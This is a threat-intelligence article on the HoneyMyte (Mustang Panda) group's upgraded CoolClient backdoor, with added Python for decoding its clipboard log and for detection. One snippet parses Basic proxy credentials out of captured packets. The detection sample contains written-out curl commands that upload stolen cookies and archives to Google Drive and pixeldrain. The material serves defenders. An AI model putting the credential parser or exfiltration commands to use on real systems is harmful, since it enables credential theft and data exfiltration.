Mustang Panda Upgrades CoolClient Backdoor with Clipboard Monitoring and Credential Theft Capabilities
The China-linked advanced persistent threat group HoneyMyte, also known as Mustang Panda or Bronze President, has significantly upgraded its CoolClient backdoor with new surveillance capabilities including clipboard monitoring, HTTP proxy credential sniffing, and browser credential theft, according to research published by Kaspersky.
The group continues to actively target government entities across Asia and Europe, with Southeast Asia being the most affected region. In 2025, researchers observed HoneyMyte deploying an enhanced CoolClient backdoor alongside multiple browser login data stealer variants and scripts designed for document theft and reconnaissance.
CoolClient Backdoor Evolves with New Features
CoolClient, first documented by Sophos in 2022, with updated versions analyzed by Trend Micro in 2023, has evolved considerably. The latest variant has been observed in campaigns targeting Myanmar, Mongolia, Malaysia, and Russia, often deployed as a secondary backdoor alongside PlugX and LuminousMoth infections.
The backdoor is delivered through DLL sideloading: a legitimately signed executable is dropped next to a malicious DLL carrying the name of a library it expects to load. Between 2021 and 2025, the threat actor abused signed binaries from Bitdefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions for this purpose. Because the host process is genuinely signed, signature-based allow-listing alone does not stop it; the useful signal is one of these executables running from an unexpected directory alongside an unsigned DLL of the expected name.
Core CoolClient functionality includes detailed system and user information collection, file upload and deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin execution for running additional in-memory modules. The latest variant adds two significant new capabilities: clipboard monitoring and HTTP proxy credential sniffing.
Clipboard and Active Window Monitoring
The new clipboard monitoring feature captures clipboard contents using GetClipboardData while simultaneously tracking the window title, process ID, and timestamp of the user's active window. This enables attackers to monitor user behavior, identify applications in use, and determine the context of data copied at any given moment.
Captured clipboard contents and active window information are encrypted using XOR with byte key 0xAC and written to C:\ProgramData\AppxProvisioning.xml.
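As an added illustration (not code from the Kaspersky report or from the malware), the following Python undoes that XOR. The report does not publish the record layout, so the sample entry below is constructed; the decoder also shows why a single-byte XOR offers no protection at all: even without knowing 0xAC, the key falls out of a 256-way brute force scored on how much the output looks like text.

```python
from __future__ import annotations

import string
from typing import Optional

XOR_KEY = 0xAC  # single-byte key reported for AppxProvisioning.xml
PRINTABLE = set(string.printable.encode())
LETTERS_AND_SPACE = set(string.ascii_letters.encode()) | {0x20}


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply or undo a single-byte XOR (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def text_score(candidate: bytes) -> int:
    """Crude 'does this look like text' score: reward letters and spaces,
    punish bytes that are not printable at all."""
    score = 0
    for b in candidate:
        if b in LETTERS_AND_SPACE:
            score += 1
        elif b not in PRINTABLE:
            score -= 10
    return score


def recover_single_byte_key(data: bytes) -> int:
    """Try all 256 keys and keep the one whose output scores best.
    Works for any single-byte XOR log, not only the 0xAC case."""
    best_key, best_score = 0, None
    for key in range(256):
        score = text_score(xor_bytes(data, key))
        if best_score is None or score > best_score:
            best_key, best_score = key, score
    return best_key


def decode_clipboard_log(data: bytes, key: Optional[int] = None) -> str:
    """Decode the captured log; if the key is not given, recover it first."""
    if key is None:
        key = recover_single_byte_key(data)
    return xor_bytes(data, key).decode("utf-8", errors="replace")


# Constructed sample: the real record layout is not published, so this is an
# illustrative pipe-delimited entry, XOR-encrypted the way the report describes.
SAMPLE_PLAINTEXT = (
    "2025-03-04 09:12:01|pid=4120|Untitled - Notepad|"
    "clipboard: svc-backup:CorrectHorseBatteryStaple\n"
)
SAMPLE_LOG = xor_bytes(SAMPLE_PLAINTEXT.encode(), XOR_KEY)

if __name__ == "__main__":
    print("recovered key: 0x%02X" % recover_single_byte_key(SAMPLE_LOG))
    print(decode_clipboard_log(SAMPLE_LOG), end="")
```

On a live host, read C:\ProgramData\AppxProvisioning.xml in binary mode and pass the bytes to decode_clipboard_log. If the real log turns out to hold UTF-16 clipboard text, change only the decode call; the XOR step is unchanged.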
HTTP Proxy Credential Extraction
CoolClient now extracts HTTP proxy credentials from network traffic by creating dedicated threads to intercept and parse raw network packets on each local IP address. The malware analyzes TCP payloads to locate Proxy-Connection headers, then extracts and decodes Base64-encoded credentials from Proxy-Authorization headers for exfiltration to command-and-control servers.
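The following Python is an added example, not the malware's code, showing the header logic such a sniffer needs and what it yields on a constructed proxied request. The caveat for defenders: Basic proxy authentication is only Base64-encoded, so any process on the host that can read the client-to-proxy traffic recovers the password in clear text, which is what turns packet capture into credential theft. Non-Basic schemes and TLS-wrapped proxy connections fall outside what this parser (and the described feature) decodes.

```python
from __future__ import annotations

import base64
import binascii
import re
from typing import Optional

# Step 1 of the described logic: the request must carry Proxy-Connection,
# i.e. it is addressed to a forward proxy. Step 2: read Proxy-Authorization.
PROXY_CONNECTION = re.compile(rb"^Proxy-Connection:", re.I | re.M)
PROXY_AUTH_BASIC = re.compile(
    rb"^Proxy-Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.I | re.M
)


def extract_proxy_credentials(tcp_payload: bytes) -> Optional[tuple[str, str]]:
    """Return (user, password) if the payload is a plaintext HTTP request to a
    proxy carrying Basic credentials; otherwise None (incomplete header block,
    no proxy headers, or a non-Basic scheme such as Negotiate/NTLM)."""
    head, sep, _body = tcp_payload.partition(b"\r\n\r\n")
    if not sep or not PROXY_CONNECTION.search(head):
        return None
    match = PROXY_AUTH_BASIC.search(head)
    if not match:
        return None
    try:
        decoded = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    user, colon, password = decoded.partition(b":")
    if not colon:
        return None  # RFC 7617: credentials are user-id ':' password
    return user.decode("latin-1"), password.decode("latin-1")


def build_proxied_request(headers: list[tuple[str, str]]) -> bytes:
    """Constructed sample of what a browser sends to a plaintext forward proxy."""
    lines = [b"GET http://intranet.example.test/ HTTP/1.1",
             b"Host: intranet.example.test"]
    lines += [f"{name}: {value}".encode() for name, value in headers]
    return b"\r\n".join(lines) + b"\r\n\r\n"


BASIC_TOKEN = base64.b64encode(b"alice:Sup3r-Secret").decode()
SAMPLE_BASIC = build_proxied_request([
    ("Proxy-Connection", "keep-alive"),
    ("Proxy-Authorization", "Basic " + BASIC_TOKEN),
])
# Same credentials sent to the origin server, not a proxy: ignored by the sniffer.
SAMPLE_DIRECT = build_proxied_request([("Authorization", "Basic " + BASIC_TOKEN)])
# Proxy request with a challenge/response scheme: nothing to Base64-decode.
SAMPLE_NEGOTIATE = build_proxied_request([
    ("Proxy-Connection", "keep-alive"),
    ("Proxy-Authorization", "Negotiate TlRMTVNTUAABAAAA"),
])

if __name__ == "__main__":
    for label, payload in (("basic", SAMPLE_BASIC), ("direct", SAMPLE_DIRECT),
                           ("negotiate", SAMPLE_NEGOTIATE)):
        print(label, "->", extract_proxy_credentials(payload))
```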
Plugin Architecture Expands Capabilities
CoolClient supports multiple plugins for extended functionality. Researchers identified three plugins actively used in campaigns: ServiceMgrS.dll for service management including enumeration, creation, and deletion; FileMgrS.dll providing comprehensive file management with capabilities for compression, execution, and network drive mapping; and RemoteShellS.dll enabling remote command execution through a hidden cmd.exe process with redirected input and output.
The FileMgrS.dll plugin was observed being pushed through C2 channels during campaigns targeting Mongolia.
Browser Credential Stealers Target Multiple Browsers
Kaspersky discovered HoneyMyte deploying dedicated browser credential stealers during post-exploitation activities. Three variants were identified targeting Chrome, Edge, and Chromium-based browsers. The malware was observed in Myanmar, Malaysia, and Thailand, with particular focus on government sector targets.
In one documented campaign involving the ToneShell backdoor in Thailand, attackers first executed a Chrome credential stealer, then downloaded and ran an Edge credential stealer via curl, followed by exfiltrating Firefox cookie files to Google Drive using a curl command with a hardcoded OAuth bearer token.
The most flexible variant accepts runtime arguments specifying paths to Login Data and Local State files, enabling it to target any Chromium-based browser including Chrome, Edge, Brave, or Opera. The stealer extracts the encrypted AES key from Local State, decrypts it using Windows DPAPI, queries the Login Data SQLite database for saved credentials, and outputs decrypted results to C:\Users\Public\Libraries\License.txt.
Document Theft and Reconnaissance Scripts
HoneyMyte deployed multiple scripts for system enumeration and data exfiltration. A batch script named 1.bat downloads curl.exe and rar.exe, performs network enumeration using nbtscan, collects system information including stored credentials, registry keys, startup items, and antivirus details, then compresses and exfiltrates browser data and documents to an FTP server.
A PowerShell script named Ttraazcs32.ps1 collects computer, user, and network information, including the public IP address and Wi-Fi details, then searches all drives for documents modified within the last 60 days with extensions including .doc, .xls, .pdf, .tif, and .txt.
Another PowerShell script named t.ps1 specifically targets browser credentials, extracting and decrypting the Chrome encrypted_key before compressing stolen data into a password-protected archive and uploading it to Pixeldrain using a hardcoded API token, demonstrating HoneyMyte's shift toward abusing public file-sharing services for covert exfiltration.
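As an added example (not from the report), the following Python turns the behaviours described in this section into process command-line detections and runs them over constructed process-creation records. The patterns are heuristics built from the tooling named here: curl with a bearer token to a Google Drive upload endpoint, a curl upload to pixeldrain.com, creation of a password-protected rar archive, and nbtscan. The sample log lines are invented for the demonstration and do not reproduce the actor's exact commands.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern[str]


# Deliberately narrow: curl and rar are legitimate in most fleets, so each rule
# keys on the exfiltration-specific combination rather than the tool alone.
RULES = [
    Rule("curl_bearer_upload_to_google_drive",
         re.compile(r"\bcurl(\.exe)?\b.*Authorization:\s*Bearer\b.*googleapis\.com/upload", re.I)),
    Rule("curl_upload_to_pixeldrain",
         re.compile(r"\bcurl(\.exe)?\b.*pixeldrain\.com", re.I)),
    Rule("rar_password_protected_archive",
         re.compile(r"\brar(\.exe)?\b\s+a\b.*\s-(hp|p)\S+", re.I)),
    Rule("nbtscan_network_enumeration",
         re.compile(r"\bnbtscan(\.exe)?\b", re.I)),
]


def match_rules(command_line: str) -> list[str]:
    """Names of every rule that fires on one command line."""
    return [rule.name for rule in RULES if rule.pattern.search(command_line)]


def scan_process_log(lines: list[str]) -> list[tuple[str, str, str]]:
    """Records are '<timestamp>,<image path>,<command line>'; the command line
    may itself contain commas. Returns (timestamp, rule, command line) hits."""
    hits = []
    for line in lines:
        try:
            timestamp, _image, command_line = line.split(",", 2)
        except ValueError:
            continue  # malformed record, skip rather than crash the scan
        for name in match_rules(command_line):
            hits.append((timestamp, name, command_line))
    return hits


# Constructed process-creation records for the demonstration.
SAMPLE_LOG = [
    r"2025-03-04T09:12:01Z,C:\Windows\System32\cmd.exe,cmd.exe /c 1.bat",
    r"2025-03-04T09:12:07Z,C:\Users\Public\nbtscan.exe,nbtscan.exe -r 10.0.0.0/24",
    r"2025-03-04T09:13:40Z,C:\Users\Public\rar.exe,rar.exe a -r -hpPassw0rd! "
    r"C:\Users\Public\docs.rar C:\Users\ops\Documents\*.doc",
    r'2025-03-04T09:14:02Z,C:\Users\Public\curl.exe,curl.exe -X POST '
    r'-H "Authorization: Bearer ya29.EXAMPLE" -F "file=@cookies.sqlite" '
    r"https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart",
    r"2025-03-04T09:15:11Z,C:\Users\Public\curl.exe,curl.exe -T docs.rar "
    r"-u :EXAMPLE_API_KEY https://pixeldrain.com/api/file/",
    # Benign curl use from a developer toolchain: must not fire.
    r"2025-03-04T09:16:00Z,C:\Program Files\Git\mingw64\bin\curl.exe,"
    r"curl.exe -sSL https://updates.example.internal/manifest.json",
]

if __name__ == "__main__":
    for timestamp, rule, command_line in scan_process_log(SAMPLE_LOG):
        print(f"{timestamp} {rule}: {command_line}")
```

Feed real Sysmon Event ID 1 or EDR process-creation exports through scan_process_log after mapping their fields to the same three columns; the rule set is the part worth tuning to the environment.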
Rootkit Development Underway
Researchers noted that in recent campaigns targeting Pakistan and Myanmar, HoneyMyte introduced a newer CoolClient variant that drops and executes a previously unseen rootkit. Technical analysis of this rootkit will be published separately.
Indicators of Compromise
CoolClient C2 infrastructure includes account.hamsterxnxx[.]com, popnike-share[.]com, and japan.Lenovoappstore[.]com. Multiple file hashes are associated with CoolClient components, plugins, browser stealers, and exfiltration scripts.
Organizations should remain vigilant against HoneyMyte's toolset including CoolClient, PlugX, ToneShell, Qreverse, and related LuminousMoth malware, as these operations are designed to maintain persistent access while conducting high-value surveillance activities.